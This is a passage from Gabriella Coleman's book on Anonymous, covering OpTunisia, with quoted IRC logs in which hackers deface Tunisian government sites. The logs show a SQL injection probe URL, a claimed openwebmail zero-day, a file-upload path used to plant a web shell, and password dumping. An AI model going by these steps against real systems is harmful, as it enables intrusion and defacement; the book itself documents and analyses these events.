Book Read Free

Hacker, Hoaxer, Whistleblower, Spy

Page 16

by Gabriella Coleman


  Anonymous, in turn, has launched DDoS attacks against the websites of the Tunisian prime minister and his corrupt government, the stock market, and the primary DNS server of Tunisia—thus successfully bringing down many of the websites ending in .tn. Additionally, we have taken steps to ensure that Tunisians can connect anonymously to the internet, and access information that their government does not want them to see.

  There has been an almost complete absence of prominent coverage. We ask, why is a news source like AlJazeera one of the few covering these earth shaking riots while the rest remain quiet? The world is getting the impression that unless western economic interests are involved, our media does not care to report upon it.

  Perhaps you didn’t know? Now that you do, you can help us spread the news. After all, you do not have to wear a mask to do it.

  Sincerely,

  Anonymous12

  “Dudes believe me the key of this is having no ego”

  But Anonymous was doing more than pestering the mainstream media to do its job. By January 2, 2011, a technical team on #internetfeds forsook their holidays to work nonstop. Indeed, Adnon told me he barely slept for two weeks. In an interview, he explained that the operation took a different approach than Operation Payback and Avenge Assange:

  : With Tunisia we had a plan

  : We thought carefully about what to do and when in a small group

  : presented a list of options in a poll

  : then took the result of the poll

  : It was much less a big group decision than other ops

  OpTunisia marked, both internally and externally, a sea change. All throughout the fall, multiple secret cabals and channels had populated Anonymous. Even Chanology had to reckon with marblecake, a cabal of its very own. While those in secret channels wielded technical power, and in many respects called the shots, they were still beholden to those in the public channel if they wanted to get things done. The angry masses of the IRC body politic kept the cabals in check—a message made clear when, earlier in the fall, the masses rose up in a collective shitstorm at #command’s attempts to cease DDoSing in response to the Pirate Party.

  The managing of OpTunisia was different: from the beginning, a handful of smaller teams composed of hackers, propaganda makers, and organizers led the operation and never let go. It was not that this team-based model displaced other mass modalities of organizing. There were other, simultaneous operations—some of which originated from the public channels with no cabal involvement. And a public IRC channel attached to OpTunisia existed, and played a valuable role.

  On January 2, 2011, a hacker named “rubik” (not his real pseudonym), who had been working on two private channels, swooped in to announce that a Tunisian website had been defaced (all pseudonyms have been changed):

  : http://www.pm.gov.tn/pm/index.php—defaced

  : way to go anons!!!!!

  : wayy to fucking go!

  : Fucking A! Nice Job

  : More to come biotches :P

  : http://www.marchespublics.gov.tn/ also.

  : http://www.pm.gov.tn and http://www.marchespublics.gov.tn/ DE-FUCKING-FACED!

  : btw mad props on the lolcats: http://www.pm.gov.tn/pm/index.php

  : http://www.pm.gov.tn/pm/index.php

  BOOYA MOTHERFUCKERS

  A group of hackers had been hard at work, cooperating as a team, for some time. Yet the majority of journalists couldn’t resist the opportunity to pinpoint a “mastermind” or “leader,” the architect ostensibly maneuvering everyone else. Ironically, an Internet search for “Anonymous leader” will yield at least four different names. Eventually, most journalists identified Sabu and Topiary as the leaders, most likely because they erroneously conflated their robust public relations presence with organizational (or dictatorial) control.13

  Although many articles single out a “ringleader” or a “mastermind,” the exact nature of what this entails is left largely unstated. The reader is left to use his or her own imagination—perhaps envisioning an elite villain sitting on a high-backed chair in some ice palace, stroking a cat on his lap as a deep echoing laugh reverberates slowly through the chambers. Adrian Chen surmised, based on leaked IRC logs, that “Sabu plays the role of a leader, enforcing unit discipline while the other members stand by.”14 And yet Chen himself belies this insight in the next breath by shifting attention to a related hack performed without Sabu’s input by another group of Anons. Analyzing a single log for evidence of a leader is about as effective as extrapolating the entire plot of a movie from a single still frame. Yet the Guardian’s Charles Arthur made the same error, writing, “For some time after the UK arrests, the only visibly active member of LulzSec remained its leader, known online as Sabu, who would simultaneously deny that he was its leader and then use phrases such as ‘my team.’”15 But broader context reveals that Sabu was simply referring to the #pure-elite channel he created long ago, and described by other LulzSec members as an IRC channel where friends of LulzSec” could hang out.

  As it turns out, hacker undertakings, especially within Anonymous, tend to be dynamic and fluid, with multiple individuals or even groups working in concert. What holds true for one operation may not for the next. Sometimes a particularly obsessive hacker engenders, for a time, an organized collective workflow. At other times, it is chaos and miscommunication. Indeed, when I interviewed Jeremy Hammond in prison much later, he bemoaned, “I wish we were more like RedHack, more disciplined.” RedHack, a Turkey-based hacktivist group, has a clear hierarchy, a leader, and a spokesperson—products, each, of sixteen years of organizing and a shared devotion to Marxist-Leninist tactics.

  Maybe Anonymous could have achieved more had it had a leader or a static hierarchy. Hackers tend to suffer from what I like to call Geek Distraction Disorder (GDD). Without oversight, a hacker could easily wind up in a field, surrounded by yaks, with a shaving razor in hand, wondering how he got there (if you understand this reference, you are at risk!). But it is equally probable that Anonymous achieved so much precisely because there was no boss pointing to a fixed destination. Whatever the case, the work unfurled organically: depending on who was on the channel, what each participant could contribute, and this willingness, in a certain moment, to learn something new—the crucial ingredient of most any successful hack.

  OpTunisia illustrates this all so well. Imagine yourself on IRC, an Anon witnessing the operation’s beginning. It is January 2, 2011, and you are working directly with Tunisian activists and hackers who are feeding you unvarnished information about a historic revolt. You are at home, sitting largely still except for your fingers moving at the keyboard, but the information you receive enables responses that can make a direct difference in the event, just one step removed from the people on the ground throwing Molotov cocktails. Your contributions won’t necessarily be significant, but they can’t be overlooked. They are personally empowering, a mechanism of solidarity, and, in some cases, perhaps even a real boon that shields those on the ground from harm. All of this depends on shifting, messy modes of cooperation—and sets the stage for organizations to spring up around a particularly good idea, and to fall apart at even a hint of disagreement and alternate paths.

  At this time there were two different and private IRC channels that were active simultaneously, #opdeface and #internetfeds. The latter is where the heavy technical lifting was done, the former where organizers congregated. A gopher shuttled news between them. Some hackers were in the know, while others were continually arriving (all pseudonyms have been changed):

  : K-rad, Any good with PostgreSQL? [PostgresSQL is a database]

  : http://www.pm.gov.tn/pm/banniere/redirectb.php?id=54&idb=3’2&

  : rubik, i’ve never messed with PostgreSQL, it is even the first time i’ve ever seen it on a box tbh

  : why are we hitting up tunisia?

  : Because they’e just pass
ed a law which says the media can’t say what they want

  : and banned them from mentioning wikileaks

  : K-rad, thank you!

  : time to own tunisia then ;)

  On other channels, users suggested DDoS campaigns, but both in Anonymous and out, there we are those who prided themselves on being “real” hackers and dismissed DDoS as lame (or even detrimental to real hacks, as we will see in a moment). Real hackers find exploits. People who just run LOIC are considered beneath the “hacker” moniker, mere “script kiddies,” or “skiddies” for short. gibnut announces that he has an “zero-day,” which is much more powerful. A zero-day exploit, or “oh day” as people sometimes jokingly call it, is a previously unknown security vulnerability in a piece of software. It is called a zero-day because it is unknown by the public—or the software authors who could fix it—for zero days and counting. A zero day is gold; anyone who knows the zero day can exploit it over and over until it is patched. The most coveted zero days provide access to a computer or network, which is why they are sold for high profit in a thriving black market. Many, many governments participate in this ethically problematic market, including the US government, who, according to technology reporter Joseph Menn, “has become the biggest buyer in a burgeoning gray market where hackers and security firms sell tools for breaking into computers.”16 The US government largely purchases zero-days from private firms that “spend at least tens of millions of dollars a year just on exploits.”17 Suffice it to say, gibnuts’s news was received with excitement:

  : lets see fuck loic, we’ll hurt them a different way

  : oh yes please

  : I have 0day local root exploit against openwebmail and Tunisia’s NIC servers run it

  : https://risala.ati.tn/cgi-bin/openwebmail/openwebmail.pl

  : if we can get into that server we can root tunisias .tn tld nameservers and control its entire internet space

  : oshit

  : redirect it all to wikileaks ;)

  : shit just got real due to gibnut

  With this zero day, gibnut is suggesting that they can compromise the domain name registrar in Tunisia (the NIC) and control the entire Tunisian top-level domain (TLD) name space. An example of a TLD is .com or .org. Each country has its own TLD; Tunisia’s is “.tn.” If the Anons can compromise this Tunisian registrar, they can redirect everyone who tries to navigate to a website that ends in .tn to any server they wish. gibnut lulzily suggests WikiLeaks. Although this particular exploit did not yield access (for unknown reasons), it did succeed in spreading an anxious optimism throughout the sidelines:18

  : let me see if I can get in… brb [be right back]

  : Arm the nuclear warheads guys.

  : Internetfeds is going in.

  : gibnut, :D nice <3

  : but first we need to find a bug on there

  : epic

  : for some reason stuff in this channel always ends up being epic

  : lol

  : ah guess i’m going to have to use some postgresql injection cheat sheet or something

  : rubik, or, download havij for windows

  : http://www.marchespublics.gov.tn IS HIGHLY INJECTABLE :3 [there is at least one vulnerability that allows an attacker to modify the site’s database in ways other than intended]

  : stand by for lulz <3

  : :o

  : looks like ministry of justice, i think, idk [I dont know]

  : i don’t know but ALOT of the sites are vuln [vulnerable]!

  Like many hackers, if they don’t know something, they go teach themselves:

  : know tht postgres bug?

  : yeah

  : i did some reading on posgres and lurned me some DB [database] so now i know how to inject it :D

  : stand by for dump

  K-rad went away for a while, clearly working hard, then came back with some results. K-rad accessed a database with sixteen hundred rows (and thus entries) and tried to crack the passwords. First apologizing—“sry guys jst taking time because i’ve never done postgres SQL and im trying to write it in to a script to make it faster as i do it”—he then realized that the ongoing DDoS was what was causing the slowdown of the password dump. He implored:

  : Someone tell optunisia DO NOT DDOS 193.95.68.156 it’s fucking up my dump

  As this was a team effort, other hackers were simultaneously trying to gain access through other potential security vulnerabilities. They realized that if they could get shell access, which enables a lower-level access to the system, they could potentially get the private emails of the prime minister of Tunisia, and then leak them. rubik managed to gain access but, unfortunately, found nothing but spam—but that didn’t stop the “owning” process. To “own,” “0wn,” or “pwn” a server basically means that you have gained the top level of privileged access and, from there on out, you have free rein to do whatever you like with it. You can read any file, write to any file, change running processes, inject your own processes/malicious code, or, if you are so inclined, delete everything. You are “root,” the full administrator of the machine, even though you are nowhere physically near the machine itself. Inevitably, of course, the Anons defaced the site, but first they attempted to score some emails:

  : I logged it but there’s nothing there

  : brb guys im going to make a fresh tea :3

  : http://www.marchespublics.gov.tn/onmp/upload/upload_fichier.php?Field=document&type=document

  : ;]

  : shall I own it now or later

  : nice

  : be best now while the anti-tuni.gov steam is still rolling

  : we could upload a shell i suppose

  : tre

  : which shells would you guys like ;]

  : i have like 40

  : it will maximize effect and morale

  : if we can root it, we need to go for email leak too!

  : not just deface!

  : :D

  : full on email leak :D:D

  : found the shell

  : www.marchespublics.gov.tn/onmp/upload/documents

  : someone make a fancy payback deface page plz :3

  As the team prepared to deface the page, K-rad excitedly declared that there was an old kernel installed. The kernel is the core component of an operating system—the contact point between the hardware and the software. An old kernel usually means that there are some known exploits, so this is almost always a good sign for someone wanting to compromise a machine:

  : here’s a deface page

  : http://pickhost.eu/images/0004/1986/anonymousdefacetunisia.jpg

  : if u like it

  : :p

  : OOOOOOOOOOOOOOOOOOOOOOOOOOOOOO OOOOOOOOOOOOOOOOOOOOOOOOOLD KERN FTW [For The Win]

  : root?

  : Not bad rubik

  : Any chance you could centre the text at the bottom though?

  : idk i didn’t make it

  : im running on tor

  : wish i hd a vpn

  duckie had just logged in to help. He was eventually booted for lacking sufficient low-level hacking ability, but he was a skilled organizer and broker, so for the time being he was allowed into the channel. He had a rare knack for naming operations and a rare level of insight into the ongoing changes affecting AnonOps:

  : Anything I can do to help which doesn’t involve actually going into the server?

  : rubik, I’ve been in and out, this channel was presumed dead for a long time

  : duckie make a deface page! :D?

  While #internetfeds was in hot pursuit of the private emails of the Tunisian prime minist
er, there was another channel, #opdeface, also hard at work. But even in the elite channel that was #internetfeds, many were blind to the existence of #opdeface. Meanwhile, the search for emails came up empty. On #opdeface, rubik gave a technical rundown of the exploit they had found on #internetfeds.

  Some Tunisian Anons realized an exploit could work on another target:

  : I repeat: Main target is ati [Tunisian Internet Agency]

  : Direct responsible for censorship

  : i have found an XSS exploit on ati site

  : OT, lol, i just thought you said that in opchannel [a public channel]

  : lol

  : not that stoned yet

  […]

  : we found admin login passwords for publicmarches.gov.tn, which is on the same box as pm.gov.tn now

  : i think we looked into ministry of communication as DDoS target

  : if it was disqualified, i don’t remember why

 
: just looking at it

  rubik, thinking they might eventually score some juicy emails, asked them for some help:

  : btw

  : can anyone prepare a statement

  : for the torrent description

  : when we get pm.gov.tn emails

  : i.e. a message to pm.gov.tn about their leaked emails

  : but not yet

  : prepare a deface page

  : unless u like http://pickhost.eu/images/0004/1986/anonymousdefacetunisia.jpg

  : and prepare a torrent description or manifesto

  Eventually, #opdeface delivered:

 

‹ Prev